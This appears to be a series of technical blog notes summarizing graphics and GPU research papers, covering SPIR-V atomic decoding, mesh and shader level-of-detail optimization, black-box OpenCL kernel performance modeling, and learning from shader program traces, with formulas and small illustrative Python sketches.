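The Scope and Memory Semantics operands are plain integer constants, so they can be decoded with two lookup tables. The Python sketch below decodes the `OpAtomicIAdd` line from the listing above. The enum values are taken from the SPIR-V specification; the function names and the `constants` dictionary (which stands in for resolving `OpConstant` ids) are hypothetical, and only a subset of scopes and semantics bits is listed.

```python
SCOPES = {0: "CrossDevice", 1: "Device", 2: "Workgroup", 3: "Subgroup", 4: "Invocation"}

SEMANTICS_BITS = {
    0x2: "Acquire",
    0x4: "Release",
    0x8: "AcquireRelease",
    0x10: "SequentiallyConsistent",
    0x40: "UniformMemory",
    0x80: "SubgroupMemory",
    0x100: "WorkgroupMemory",
    0x200: "CrossWorkgroupMemory",
    0x400: "AtomicCounterMemory",
    0x800: "ImageMemory",
}


def decode_semantics(mask):
    names = [name for bit, name in SEMANTICS_BITS.items() if mask & bit]
    return names or ["None (Relaxed)"]


def decode_atomic(line, constants):
    """Decode '%r = OpAtomicIAdd <type> <pointer> <scope> <semantics> <value>'."""
    result, _, opcode, result_type, pointer, scope_id, sem_id, value_id = line.split()
    return {
        "opcode": opcode,
        "result": result,
        "pointer": pointer,
        "scope": SCOPES[constants[scope_id]],
        "semantics": decode_semantics(constants[sem_id]),
        "value": constants[value_id],
    }


# Values of the OpConstant ids used by the instruction (from the listing above).
constants = {"%uint_1": 1, "%uint_0": 0, "%int_1": 1}
decoded = decode_atomic("%19 = OpAtomicIAdd %int %14 %uint_1 %uint_0 %int_1", constants)
```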

Coming soon

Matrix types
Derivatives dFdx / dFdy & discard
- https://github.com/gpuweb/gpuweb/issues/361
- http://www.xionggf.com/post/opengl/an_introduction_to_shader_derivative_functions/
Group Ops

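Paper reading | Automatic Mesh and Shader Level of Detail 2023-02-21

This paper presents algorithms that jointly optimize the LODs of a mesh and its shader over adaptively partitioned distance groups.

The paper first proposes an algorithm called "alternating optimization". It mutates the shader with a genetic algorithm to obtain a number of variants, then runs a mesh simplification algorithm driven by image loss so that, at a given distance, the computational cost of each variant stays below a given budget while its error meets the requirement. The variants are then ranked, and the top N% enter the next round of alternating optimization. The result is obtained after several rounds.

Because alternating optimization is slow, the paper also proposes a "separate optimization" algorithm. It first simplifies the mesh and the shader independently, producing sequences of shader and mesh variants with monotonically decreasing quality, and then picks a suitable (mesh, shader) pair for each distance group. To make transitions between LOD groups as smooth as possible, the paper additionally searches for the smoothest LOD switching path and optimizes the number of LOD groups.

Method overview

Formulation

For the shader and mesh simplification problem, define the triple $ (M_i, S_i, d_i) $, where

$ M_i $ is the $ i $-th simplified variant of the original mesh $ M $
$ S_i $ is the $ i $-th simplified variant of the original shader $ S $
$ d_i $ is the distance to the camera

Define $ \epsilon_a(i) $ as the absolute image error of the simplified variant $ (M_i, S_i, d_i) $: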

$$ \epsilon_a (i) = \int_H \| f(M_i, S_i, d_i) - \bar{f}(M, S, d_i) \| dH $$

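The integration domain of this error model is $ H = V \times U \times X \times Y $, where

$ V $ is a discrete set of view directions
$ U $ is a set of shader uniform parameters, such as the light direction
$ X \times Y $ are the two dimensions of image space

The norm here is the pixelwise RGB $ L^2 $ norm.

In addition, define $ \epsilon_t(i) $ as the visual difference between two adjacent simplification groups: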

$$ \epsilon_t (i) = \int_H \| f(M_i, S_i, d_{i+1}) - f(M_{i+1}, S_{i+1}, d_{i+1}) \| dH $$

The LOD optimization problem can then be stated as:

$$ \begin{aligned} \mathop{\arg \min}_{M_i, S_i, d_i} \quad & t = \mathrm{Cost} ( f(M_i, S_i, d_i) ) \\ \mathrm{s.t.} \quad & \epsilon_a(i) < e_a (d_i) \cdot s_{d_i} \end{aligned} $$

where Cost is the time cost of shading this mesh with this shader, $ e_a (d_i) $ is the absolute per-pixel error bound at distance $ d_i $, and $ s_{d_i} $ is the projected size of mesh $ M_i $ at distance $ d_i $.

$ e_a(d) $ uses a heuristic function proposed in earlier work:

$$ e_a(d) = \left( \frac{d-d_{near}}{d_{far} - d_{near}} \right)^Q \cdot e_{max} $$

where

$ d_{near} $ and $ d_{far} $ are the configured view frustum parameters
$ e_{max} $ is the maximum absolute per-pixel error bound
- that is, the maximum of the integrand of $ \epsilon_a(i) $ over all parts of the integration domain
$ Q \in [0, 1] $ reflects how much error is tolerated
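
The heuristic bound and the constraint of the optimization problem translate directly into code. This is a minimal Python sketch; the function names and the sample numbers are made up for illustration, and `projected_size` stands for $ s_{d_i} $.

```python
def absolute_error_bound(d, d_near, d_far, e_max, q):
    """e_a(d) = ((d - d_near) / (d_far - d_near)) ** Q * e_max."""
    if not d_near <= d <= d_far:
        raise ValueError("d must lie inside [d_near, d_far]")
    t = (d - d_near) / (d_far - d_near)
    return (t ** q) * e_max


def is_feasible(epsilon_a, d, projected_size, d_near, d_far, e_max, q):
    """Constraint of the LOD problem: epsilon_a(i) < e_a(d_i) * s_{d_i}."""
    return epsilon_a < absolute_error_bound(d, d_near, d_far, e_max, q) * projected_size


# Hypothetical numbers: frustum [1, 101], e_max = 0.1, Q = 0.5.
near_bound = absolute_error_bound(1.0, 1.0, 101.0, 0.1, 0.5)
mid_bound = absolute_error_bound(26.0, 1.0, 101.0, 0.1, 0.5)
far_bound = absolute_error_bound(101.0, 1.0, 101.0, 0.1, 0.5)
```

The bound is zero at the near plane and reaches $ e_{max} $ at the far plane. With $ Q < 1 $ it grows quickly close to the camera and flattens out farther away.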

Alternating optimization

Shader simplification

The shader simplification here mainly builds on earlier papers:

[3] Y. He, T. Foley, N. Tatarchuk, and K. Fatahalian, “A system for rapid, automatic shader level-of-detail,” ACM Trans. on Graph. (TOG), vol. 34, no. 6, p. 187, 2015.

[8] R. Wang, X. Yang, Y. Yuan, W. Chen, K. Bala, and H. Bao, “Automatic shader simplification using surface signal approximation,” ACM Trans. on Graph. (TOG), vol. 33, no. 6, p. 226, 2014.

[18] F. Pellacini, “User-configurable automatic shader simplification,” ACM Trans. Graph., vol. 24, no. 3, pp. 445–452, 2005.

[21] P. Sitthi-Amorn, N. Modly, W. Weimer, and J. Lawrence, “Genetic programming for shader simplification,” in ACM Transactions on Graphics (TOG), vol. 30, no. 6. ACM, 2011, p. 152.

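Convert the vertex shader and the fragment shader into an abstract syntax tree (AST) and a program dependence graph (PDG)
Apply different simplification rules to generate simplified shaders
- Operation Removal: reduce $ op(a, b) $ to $ a $ or $ b $
- Code Transformation: move per-pixel pixel shader operations to per-vertex or per-tessellated-vertex operations to reduce the amount of computation
- Moving to parameter: replace a parameter by its mean ($ n \to average(n) $), compute it in the "parameter stage" (see [3]), and feed the mean into the GPU shader as the result

This paper makes no additional contribution to shader optimization itself. These methods mainly come from [3].

Mesh simplification

Mesh simplification work: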

[4] M. Garland and P. S. Heckbert, “Surface simplification using quadric error metrics,” in Proceedings of the 24th annual conference on Computer graphics and interactive techniques. ACM Press/Addison-Wesley Publishing Co., 1997, pp. 209–216.

[7] P. Lindstrom and G. Turk, “Image-driven simplification,” ACM Transactions on Graphics (ToG), vol. 19, no. 3, pp. 204–241, 2000.

The paper mainly uses the image-driven simplification method from [7]. The method is based on vertex-pair collapse: each step collapses the vertex pair that increases the image error the least.

QEM

https://www.cs.cmu.edu/~./garland/Papers/quadrics.pdf
http://mgarland.org/research/quadrics.html
https://blog.csdn.net/lafengxiaoyu/article/details/72812681

QEM is a classic algorithm proposed at SIGGRAPH '97. At the time of writing it has roughly 5000 citations.

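Alternating optimization

Given a mesh $ M $ and a shader $ S $,

Run shader optimization (which produces a set of variants $ S_i $)
For each $ S_i $ on the Pareto frontier, run mesh simplification with that shader, so that the new $ M_j $ is the simplest mesh that still meets the quality requirement (that is, error <= absolute error bound)
An $ S_i $ on the Pareto frontier satisfies
- no other shader has the same performance and better quality
- no other shader has the same quality and better performance
Sort these $ (M_j, S_i) $ pairs by rendering performance and take the top 20% as seeds for the next iteration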
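
The two selection steps above (Pareto filtering and keeping the fastest 20%) can be sketched in a few lines of Python. The data layout, the function names, and the numbers are hypothetical, and the dominance test uses the common "no worse in both, strictly better in one" definition, which is slightly more general than the two bullet points.

```python
import math


def pareto_frontier(variants):
    """variants: list of (name, cost, error); lower is better for both."""
    frontier = []
    for name, cost, error in variants:
        dominated = any(
            c <= cost and e <= error and (c < cost or e < error)
            for _, c, e in variants
        )
        if not dominated:
            frontier.append(name)
    return frontier


def select_seeds(pairs, fraction=0.2):
    """pairs: list of (label, render_time); keep the fastest `fraction`."""
    keep = max(1, math.ceil(len(pairs) * fraction))
    return sorted(pairs, key=lambda pair: pair[1])[:keep]


# Hypothetical shader variants: (name, render cost, image error).
shader_variants = [("S0", 10, 0.00), ("S1", 6, 0.02), ("S2", 7, 0.05), ("S3", 3, 0.10)]
frontier = pareto_frontier(shader_variants)

# Hypothetical (mesh, shader) pairs with their render times.
seeds = select_seeds([("a", 5.0), ("b", 1.0), ("c", 3.0), ("d", 4.0), ("e", 2.0)])
```

In this example `S2` is dropped because `S1` is both cheaper and more accurate, and one of the five pairs survives as a seed.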

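Separate optimization

Generating mesh variants

Since nothing is known about the simplified shaders at this point, the authors shade with the original shader and use the supersampled / filtered images as the loss for mesh simplification.

Because some edge collapses barely affect the visual result, only K (K = 500 in the implementation) simplified meshes with a relatively large change in error are kept as candidate variants.

Generating shader variants

In theory, the optimal shader variant differs across scene configurations (simplified mesh & distance).

However, because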

First, as has been proven in prior work [3], the performance and error of shader variants can be predicted instead of being actually evaluated. In this way, we do not need to actually render every shader variant under all scene configurations.

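In [3], performance is predicted with a simple heuristic, namely scalar fp ops + 100 * texture ops (different shader stages have different weights, and the number of parameters incurs an extra penalty).

Error is evaluated through an error cache plus occasional re-evaluation.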
Second, we noted that for one shader variant with one simplified mesh, the shading errors at distances could be approximated by filtering the rendered image at the closest distance.

That is, render the shading result at the closest distance, then filter it to emulate the result farther away.
Finally, we further observed that although these Pareto frontiers may change with scene configurations, the shader variants on Pareto frontiers are similar at similar distances and with similarly simplified meshes.

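The shader variants on the Pareto frontier are fairly stable and change little as the scene configuration changes.

So the authors only compute the optimal shader variants for representative distances and representative simplified meshes, rather than enumerating all scene configurations.

The authors uniformly pick 4 of the N distance groups, and within each distance group pick 10 of the simplified meshes from above (those around the Pareto frontier), which gives 40 combinations. Genetic programming is then used to find the optimal simplified shader for each (distance, mesh) combination. All of these optimized shader variants are collected into one array.

The authors then approximate the whole problem as finding the boundary of the feasible region within a convex region, so a 1D search suffices and the 2D region does not have to be traversed.

After that, a find-smooth-path technique is used to obtain reasonably continuous LOD transitions.

Concretely, the weight of each edge is the image loss at the boundary, so transitions with a small image loss are more likely to be chosen.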
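
One way to read the smooth-path step is as a shortest-path problem on a layered graph: each distance group is a layer, each feasible (mesh, shader) candidate is a node, and each edge carries the transition image loss. The Python sketch below solves that with dynamic programming. It is an assumption about how such a search could look, not the paper's exact algorithm; the function name, the candidate labels, and the error values are hypothetical.

```python
def smoothest_path(candidates_per_group, transition_error):
    """Pick one candidate per distance group, minimizing the summed transition error.

    candidates_per_group: list of lists of hashable candidate labels,
                          ordered from the nearest to the farthest group.
    transition_error(a, b): image loss when switching from a to b.
    """
    # best[c] = (total error of the best path ending at c, that path)
    best = {c: (0.0, [c]) for c in candidates_per_group[0]}
    for group in candidates_per_group[1:]:
        next_best = {}
        for cand in group:
            cost, path = min(
                (
                    (prev_cost + transition_error(prev, cand), prev_path)
                    for prev, (prev_cost, prev_path) in best.items()
                ),
                key=lambda item: item[0],
            )
            next_best[cand] = (cost, path + [cand])
        best = next_best
    return min(best.values(), key=lambda item: item[0])


# Hypothetical example: three distance groups with made-up transition losses.
groups = [["A0", "A1"], ["B0", "B1"], ["C0"]]
errors = {
    ("A0", "B0"): 1, ("A0", "B1"): 5,
    ("A1", "B0"): 4, ("A1", "B1"): 1,
    ("B0", "C0"): 3, ("B1", "C0"): 1,
}
total, path = smoothest_path(groups, lambda a, b: errors[(a, b)])
```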

Finally, LOD groups that differ little are merged.

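Paper reading | Black-box GPU performance modeling that balances accuracy and scope 2023-02-16

Introduction

This paper proposes a cross-machine, black-box, microbenchmark-based method that analytically predicts the execution time of different implementation variants of an OpenCL kernel and selects the best one.

In short, the overall idea is: collect the features that occur in a kernel and how often each one occurs at run time, use microbenchmarks on the target platform to measure how much run time each occurrence of a feature costs, and then fit the final run time with a (multiple) linear model.

Since the paper is long, its rough structure is listed here:

Section 1: Introduction
Section 2: An illustrative example
Section 3: Overview of the contributions
Section 4: Assumptions and limitations
Section 5: Gathering kernel statistics
Section 6: Modeling kernel execution time
Section 7: Calibrating model parameters
Section 8: Results
Section 9: Other related performance modeling approaches surveyed by the authors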

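Assumptions and limitations of the paper

Some assumptions mentioned in the paper:

(usefulness) The model helps users understand the performance characteristics of a given machine and gives an optimizer predicted performance data for the variants, while reducing the number of measurements that have to be taken on the target system
(accuracy) According to the literature the authors surveyed, no method for the GPU kernel performance prediction problem addressed here consistently achieves better than single-digit percent prediction error, so this paper adopts the same target
(cost-explanatory) Unlike ranking-based approaches (Chen et al. (2018)), although the goal is to choose among variants, the primary output of the model is run time, and it uses a fairly interpretable linear model

Some limitations mentioned in the paper:

Hardware resource utilization:
- Hardware resource utilization affects the final performance. For example, peak floating-point performance depends on SIMD lane utilization, and on-chip state storage (VGPR, scratchpad memory) affects the utilization of scheduling slots, which in turn affects the ability to hide latency
- However, with the paper's approach the basic performance loss factors are fairly easy to explain and estimate, for example the achieved memory bandwidth utilization and the peak FLOP/s
- Even when the hardware cannot be fully utilized, the model still applies as long as utilization stays relatively stable as the parameters vary. When utilization does vary, the only feasible way to keep the model applicable is to lower its granularity to something like the SIMD lane level, so that changes in utilization no longer matter. The ECM family of models handles the problem this way.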
  
  ?
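- To simplify this problem, the paper fixes the workgroup size at 256.
Simplifications in program modeling:
- The model mainly detects operations of particular classes (e.g. floating-point operations, particular kinds of memory access) and the number of times each such feature occurs, where the count is modeled as a non-data-dependent feature.
  - Polyhedrally-given loop domain?
- All branch instructions are assumed to execute both branches, i.e. the GPU is assumed to execute them via masking.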
  
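  The paper considers this to match GPU behavior, but that is clearly not entirely true. Newer GPUs support both branching and masking. Masking exists so that short branches do not have to interrupt the pipeline.
Memory access cost estimation:
- The cost of a memory access is affected by the locality of the program's accesses and, for banked memory, by bank conflicts.
- The paper splits memory accesses into two kinds:
  - Simple access patterns that are common across programs are classified by interlane stride, utilization ratio, and data width, using the approach of Section 6.1.1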
    
    quasi-affine?
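  - For more complex access patterns, Section 7.1.1 provides a mechanism that extracts the pattern into a standalone loop performing the same accesses and measures it
Platform independence:
- The system proposed in the paper targets OpenCL, but a similar system could be implemented for CUDA fairly easily.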

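Gathering kernel statistics

Computing the expected number of occurrences of each feature

As mentioned above, the paper assumes that the trip count of every loop in the program is independent of the data used in the run, i.e. non-data-dependent.

In this setting, a simple way to find how many times each statement in a loop body runs is to fully unroll all loops, but that is inefficient. Instead, the problem can be viewed as follows: in the $ d $-dimensional integer space $ \mathbb{Z}^d $, the feasible region is the subregion cut out by the hyperplanes of the constraints, and the execution count of a statement is the number of integer lattice points in that subregion.

The paper mentions that the barvinok and isl libraries together solve this problem of counting statement executions inside loop bodies. barvinok is based on Barvinok's algorithm, a fairly efficient algorithm for counting the lattice points in a rational convex polytope.

Of course, the features of actual computation or data movement within one statement, and their counts, still have to be analyzed as well.

Why abstract this as a rational convex polytope? Because the actual trip counts also depend on some parameters of the kernel itself and on the kernel's launch parameters. The aim is to carry these parameters through a symbolic computation, which makes the model more useful (for example, optimizing over these parameters becomes easier).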
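
As a small illustration of "statement count = number of lattice points", consider a hypothetical triangular loop nest (not taken from the paper) whose domain is $ \{ (i, j) \in \mathbb{Z}^2 : 0 \le j \le i < n \} $. The Python sketch below counts the points by brute force and compares the result with the closed-form polynomial in the parameter $ n $. A tool such as barvinok would derive that closed form symbolically; it is not called here.

```python
def count_by_enumeration(n):
    """Count executions of the innermost statement by running the loops."""
    count = 0
    for i in range(n):
        for j in range(i + 1):   # 0 <= j <= i
            count += 1
    return count


def count_closed_form(n):
    """Number of lattice points of the triangle, as a polynomial in n."""
    return n * (n + 1) // 2


# The parametric count agrees with brute force for every tested size.
agreement = all(count_by_enumeration(n) == count_closed_form(n) for n in range(50))
```

The closed form stays cheap to evaluate for any $ n $, while the enumeration cost grows with the trip count, which is the reason for keeping the count symbolic.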

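Count granularity

The idea behind count granularity is that the resulting counts should be as close as possible to the number of operations the real GPU hardware executes.

For example, in OpenCL's scheduling model each sub-group is matched as closely as possible to the GPU's smallest scheduling unit. Depending on hardware capabilities, primitives such as reduce and scatter are supported within a sub-group, and arithmetic instructions are generally scheduled and implemented at sub-group granularity. Arithmetic instructions should therefore be counted per sub-group.

Of course, the number of sub-groups depends on the kernel launch parameters, but this dependence is polynomial (e.g. work-group count / 32), so it can be kept as a parametric quantity, which makes the trip counts computed above parametric as well.

There are three granularities:

per work-item
- Barrier synchronization
per sub-group (the sub-group size must be supplied by the user)
- On-chip operations: arithmetic instructions and local memory accesses
- Uniform accesses: global memory accesses with an lid(0) stride of 0, i.e. multiple threads access the same memory location
per work-group (no example given)

The discussion here is not very detailed and should be read together with what follows.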
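
To make the per-sub-group granularity concrete, here is a rough sketch of how a per-work-item operation count might be turned into a per-sub-group count. The function names and the rounding-up of partially filled sub-groups are assumptions made for illustration, not something taken from the paper.

```python
def num_sub_groups(num_work_groups: int, work_group_size: int, sub_group_size: int) -> int:
    """Sub-groups launched in total, rounding up within each work-group (assumed)."""
    per_group = (work_group_size + sub_group_size - 1) // sub_group_size
    return num_work_groups * per_group


def per_sub_group_count(ops_per_work_item: int, num_work_groups: int,
                        work_group_size: int, sub_group_size: int) -> int:
    """Count an on-chip operation once per sub-group rather than once per work-item."""
    return ops_per_work_item * num_sub_groups(
        num_work_groups, work_group_size, sub_group_size)


# 64 work-groups of 256 work-items, sub-group size 32, 128 multiply-adds per work-item
total = per_sub_group_count(128, 64, 256, 32)
```

Because the result is a simple expression in the launch parameters, it can stay symbolic alongside the loop trip counts.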

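Modeling kernel execution time

$$ T_\text{wall}({\bf n}) = \text{feat}^\text{out}({\bf n}) \approx g(\text{feat}^\text{in}_0({\bf n}), ..., \text{feat}^\text{in}_j({\bf n}), p_0, ..., p_k) $$

where:

$ {\bf n} $ is an integer vector that stays constant throughout a computation and depends only on the kernel variant
$ \text{feat}^\text{in}_j({\bf n}) $ is the number of occurrences of some unit feature (e.g. the number of single-precision FP32 multiplications)
$ p_i $ are hardware-dependent calibration parameters
$ g $ is a differentiable function supplied by the user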

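Kernel features

Data motion features

For most compute kernels, data movement accounts for the bulk of the cost.

Memory access patterns:

Memory type: global / local
Access type: load / store
the local and global strides along each thread axis in the array index
- That is, how much the offset into the array grows each time gid(0), gid(1), lid(0), or lid(1) is incremented by one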
the ratio of the number of element accesses to the number of elements accessed (access-to-footprint ratio, or AFR)
- AFR = 1: every element in the footprint is accessed one time
- AFR > 1: some elements are accessed more than once
  - In this case the cache may provide a speedup

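The paper notes that an analytical model has to capture many machine details, such as workgroup scheduling and the memory system architecture, to reach accuracy comparable to a black-box model. One example: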
for (int k_out = 0; k_out <= ((-16 + n) / 16); ++k_out)
  ...
  a_fetch[...] = a[n*(16*gid(1) + lid(1)) + 16*k_out + lid(0)];
  b_fetch[...] = b[n*(16*k_out + lid(1)) + 16*gid(0) + lid(0)];
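The memory access patterns in this example are as follows:

| Array | Ratio | Local strides | Global strides | Loop stride |
| --- | --- | --- | --- | --- |
| a | n/16 | {0:1, 1:n} | {0:0, 1:n*16} | 16 |
| b | n/16 | {0:1, 1:n} | {0:16, 1:0} | 16*n |

The two access patterns differ in performance by roughly a factor of 5.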
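
The n/16 ratio can be checked by brute force. The sketch below enumerates every access to the array a from the loop above and divides the number of accesses by the number of distinct elements touched. It assumes an n x n global size with 16 x 16 work-groups and n divisible by 16; that launch configuration and the function name are assumptions, since the excerpt does not state them.

```python
def access_to_footprint_ratio(n: int, tile: int = 16) -> float:
    """AFR of the `a` fetch: total element accesses / distinct elements accessed."""
    groups = n // tile
    accesses = 0
    footprint = set()
    for gid1 in range(groups):
        for gid0 in range(groups):  # gid(0) does not appear in the index of `a`
            for lid1 in range(tile):
                for lid0 in range(tile):
                    for k_out in range(groups):  # k_out <= (n - 16) / 16
                        index = n * (tile * gid1 + lid1) + tile * k_out + lid0
                        accesses += 1
                        footprint.add(index)
    return accesses / len(footprint)


# Compare against the n/16 entry in the table
for n in (16, 32, 64):
    assert access_to_footprint_ratio(n) == n / 16
```

Every element of a is re-read once per work-group along gid(0), which is where the factor n/16 comes from.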

With this approach, a universal model for all kernels on all hardware based on kernel-level features like ours could need a prohibitively large number of global memory access features and corresponding measurement kernels. This motivates our decision to allow proxies of “in-situ” memory accesses to be included as features, which in turn motivates our ‘work removal’ code transformation, discussed in Section 7.1.1. This transformation facilitates generation of microbenchmarks exercising memory accesses which match the access patterns found in specific computations by stripping away unrelated portions of the computation in an automated fashion.

Specifying Data Motion Features in the Model: tag the accesses (e.g. aLD, bLD) and refer to them through f_mem_access_tag

They can also be specified by hand, without run-time measurement:

model = Model(
  "f_cl_wall_time_nvidia_geforce",
  "p_f32madd * f_op_float32_madd + "
  "p_f32l * f_mem_access_local_float32 + "
  "p_f32ga * f_mem_access_global_float32_load_lstrides:{0:1;1:>15}_gstrides:{0:0}_afr:>1 + "
  "p_f32gb * f_mem_access_global_float32_load_lstrides:{0:1;1:>15}_gstrides:{0:16}_afr:>1 + "
  "p_f32gc * f_mem_access_global_float32_store"
)

The explicit syntax is: "f_mem_access_tag:<mem access tag>_<mem type>_<data type>_<direction>_lstrides:{<local stride constraints>}_gstrides:{<global stride constraints>}_afr:<AFR constraint>"

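Arithmetic operation features

Features:

Operation type: addition, multiplication, exponentiation
Data type: float32, float64

The paper does not consider integer arithmetic features, because in the kernel variants the model covers, integer arithmetic is used only for array index computation.

Synchronization features

Features:

Local barriers
Kernel launches

Local barriers are counted per work-item; depending on how the program actually synchronizes, the count may need to be multiplied by the number of work-items that synchronize together.

Put simply, the more threads take part in a synchronization, the longer it is assumed to take.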

Recall that the statistics gathering module counts the number of synchronizations encountered by a single work-item, so depending on how a user intends to model execution, they may need to multiply a synchronization feature like local barriers by, e.g., the number of work-groups, a feature discussed in the next section.

A user might incorporate synchronization features into this model as follows:
model = Model("f_cl_wall_time_nvidia_geforce",
  "p_f32madd * f_op_float32_madd + "
  ...
  "p_barrier * f_sync_barrier_local * f_thread_groups + "
  "p_launch * f_sync_kernel_launch"
)

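Other features

Thread groups feature
- Given the workgroup count, compensates for differences in launch time across workgroup counts
OpenCL wall time feature
- For a given platform and device, the kernel is run 60 times and the average wall time is used as the output feature
- “We measure kernel execution time excluding any host-device transfer of data.”

A complete model: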

model = Model("f_cl_wall_time_nvidia_geforce",
  "p_f32madd * f_op_float32_madd + "
  "p_f32l * f_mem_access_local_float32 + "
  "p_f32ga * f_mem_access_global_float32_load_lstrides:{0:1;1:>15}_gstrides:{0:0}_afr:>1 + "
  "p_f32gb * f_mem_access_global_float32_load_lstrides:{0:1;1:>15}_gstrides:{0:16}_afr:>1 + "
  "p_f32gc * f_mem_access_global_float32_store + "
  "p_barrier * f_sync_barrier_local * f_thread_groups + "
  "p_group * f_thread_groups + "
  "p_launch * f_sync_kernel_launch"
)

Calibrating model parameters

Work Removal Transformation: a code transformation that can extract a set of desired operations from a given computation, while maintaining overall loop structure and sufficient data flow to avoid elimination of further parts of the computation by optimizing compilers

The Work Removal transformation strips on-chip work from a kernel, which serves two purposes:

Measuring the time taken by on-chip work and by global memory access separately, to decide whether latency hiding has to be taken into account
Measuring the time taken by a particular memory access pattern

Measurement kernel design

Global memory access
- AFR = 1: Fully specified by local strides, global strides, data size
  - That is, patterns that do not produce a write race and not nested inside sequential loops
  - Performs global load from each of a variable number of input arrays using the specified access pattern
  - Each work-item then stores the sum of the input array values it fetched in a single result array
  - Params: data type, global memory array size, work-group dimensions, number of input arrays, thread index strides
- AFR > 1:
  - Use Work Removal Transformation to generate dedicated measurement kernel.
Arithmetic operations
- First, have each work-item initialize 32 private variables of the specified data type
- Then, perform a loop in which each iteration updates each variable using the target arithmetic operation on values from other variables
  - This is to create structural dependency
- We unroll the loop by a factor of 64 and arrange the variable assignment order to achieve high throughput using the approach found in the Scalable HeterOgeneous Computing (SHOC) OpenCL MaxFlops.cpp benchmark (Danalis et al. 2010).
  - the 32 variable updates are ordered so that no assignment depends on the most recent four statements
    - 32 is used because it permits maximum SIMD lane utilization & prevent from spilling too many registers
  - we sum the 32 variable values and store the result in a global array according to a user-specified memory access pattern
    - (NOTE: The actual cost can be deduced by changing the run count of the arithmetic ops)
    - include the global store to avoid being optimized away
Local memory access
- Tags: data type, global memory array size, iteration count, and workgroup dimensions
  - Data type determines the local data stride
1. each workitem initializes one element of a local array to the data type specified
2. Then we have it perform a loop, at each iteration moving a different element from one location in the array to another.
  - We avoid write-races and simultaneous reads from a single memory location, and use an lid(0) stride of 1, avoiding bank conflicts.
3. After the loop completes, each work-item writes one value from the shared array to global memory
Other features
- executes a variable number of local barriers, to measure operation overlapping behaviour (Section 7.4)
- Empty kernel launch, to measure kernel launching overhead

The paper states: Using a sufficiently high-fidelity model, we expect that users will be able to differentiate between latency-based costs of a single kernel launch and throughput-related costs that would be incurred in pipelined launches.

How?

Computing model parameters

Least squares fitting is used to obtain the relationship between the counts of the given features in the feature vector and the total run time.
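
As an illustration of the fitting step, the sketch below fits a two-parameter linear model t ≈ p0 * f0 + p1 * f1 by solving the 2x2 normal equations directly. The feature counts and timings are synthetic numbers invented for the example, and the function name is hypothetical; a real calibration would use many more features and a general least-squares solver.

```python
def fit_two_params(rows, times):
    """Least-squares fit of t ~= p0*f0 + p1*f1 via the 2x2 normal equations."""
    a00 = sum(f0 * f0 for f0, _ in rows)
    a01 = sum(f0 * f1 for f0, f1 in rows)
    a11 = sum(f1 * f1 for _, f1 in rows)
    b0 = sum(f0 * t for (f0, _), t in zip(rows, times))
    b1 = sum(f1 * t for (_, f1), t in zip(rows, times))
    det = a00 * a11 - a01 * a01
    if det == 0:
        raise ValueError("feature columns are linearly dependent")
    # Cramer's rule on [[a00, a01], [a01, a11]] @ [p0, p1] = [b0, b1]
    return (b0 * a11 - a01 * b1) / det, (a00 * b1 - a01 * b0) / det


# Synthetic measurement kernels: (feature 0 count, feature 1 count) -> time
rows = [(1, 0), (0, 1), (2, 3), (4, 1)]
times = [2.0 * f0 + 0.5 * f1 for f0, f1 in rows]  # generated with p = (2.0, 0.5)
p0, p1 = fit_two_params(rows, times)
```

With noise-free synthetic data the fit recovers the generating parameters; with real measurements it returns the parameters that minimize the squared error.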

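Modeling operation overlap

Global memory latency and on-chip latency can potentially hide each other.

The paper's modeling builds on a simple idea, $ \max (c_{onchip}, c_{gmem}) $: take the $ \max $ of the time spent in the two classes of operations.

However, $ \max $ is not differentiable everywhere, so a differentiable approximation is used instead; see the paper for details.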
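
To show what a differentiable stand-in for $ \max $ can look like, here is a sketch using a p-norm. This is a commonly used smooth approximation chosen for illustration and is not necessarily the function the paper uses; the name smooth_max and the default exponent are assumptions.

```python
def smooth_max(a: float, b: float, p: float = 8.0) -> float:
    """p-norm approximation of max(a, b) for non-negative costs a and b."""
    if a < 0 or b < 0:
        raise ValueError("costs must be non-negative")
    return (a ** p + b ** p) ** (1.0 / p)


c_onchip, c_gmem = 1.0, 10.0
overlapped = smooth_max(c_onchip, c_gmem)  # close to 10.0, the dominant cost
balanced = smooth_max(2.0, 2.0)            # overshoots max by at most a factor 2**(1/p)
```

A larger p tracks the true maximum more tightly, at the price of sharper curvature near a == b.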

Paper Reading | Learning from Shader Program Traces 2023-01-03

Introduction

Program trace
- In software engineering, a trace refers to the record of all states that a program visits during its execution, including all instructions and data.
- The shader program trace in this paper includes only intermediate results (data), not the instruction sequence.

Since the fragment shader program operates independently per pixel, we can consider the full program trace as a vector of values computed at each pixel – a generalization from simple RGB.

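Method

The input is a procedural fragment shader program written in a DSL (embedded in Python), which is translated into a TensorFlow program
- It can output both the rendered image and the generated program trace
- Branches are flattened and loops are unrolled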
- These policies permit us to express the trace of any shader as a fixed-length vector of the computed scalar values, regardless of the pixel location

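Input feature reduction

Compiler optimizations
- Ignore constant values and duplicate nodes in the compute graph, since their results should be highly uniform across pixel locations
Do not generate traces for built-in functions
Detect and filter out the intermediate trace results of loops that follow an iterative-improvement pattern
- e.g. the raymarching iterations that search for the closest intersection
Uniform feature subsampling
- The most straightforward strategy is to subsample the vector by some factor n, retaining only every nth trace feature as ordered in a depth first traversal of the compute graph
Other sampling schemes (none of them worked very well)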
- clustering
- loop subsampling
- first or last
- mean and variance

We first apply compiler optimizations, then subsample the features with a subsampling rate that makes the trace length be most similar to a fixed target length.

For all experiments, we target a length of 200, except where specifically noted such as in the simulation example.
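
A minimal sketch of the uniform subsampling step: pick the stride n whose subsampled length is closest to the target, then keep every nth feature. The function names are hypothetical and the trace is represented as a plain Python list; tie-breaking toward the smaller stride is an arbitrary choice made here.

```python
def choose_stride(trace_length: int, target_length: int = 200) -> int:
    """Stride n for which keeping every nth feature lands closest to the target length."""
    def kept(n: int) -> int:
        return len(range(0, trace_length, n))

    best = 1
    for n in range(2, trace_length + 1):
        if abs(kept(n) - target_length) < abs(kept(best) - target_length):
            best = n
    return best


def subsample(trace: list, target_length: int = 200) -> list:
    """Keep every nth trace feature, in the trace's existing order."""
    return trace[::choose_stride(len(trace), target_length)]


features = subsample(list(range(1000)))  # stride 5 gives exactly 200 features
```

Traces that are already shorter than the target are returned unchanged, since stride 1 is then the closest choice.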

After compiling and executing the shader, we have for every pixel: a vector of dimension N: the number of recorded intermediate values in the trace

Feature whitening

This mainly deals with outliers in the shader trace so that they do not disturb training and inference. The approach is scaling + clamping.

Check if the distribution merits clamping
- If N <= 10, no need to clamp
- Else, do clamp
  - Discard NaN, Inf, -Inf
  - let $P_0$ = lowest p’th percentile, $P_1$ = highest p’th percentile, hyperparameter $ \gamma $
  - Clamp to $ [P_0 - \gamma(P_1 - P_0), P_1 + \gamma(P_1 - P_0)] $
- Do rescale
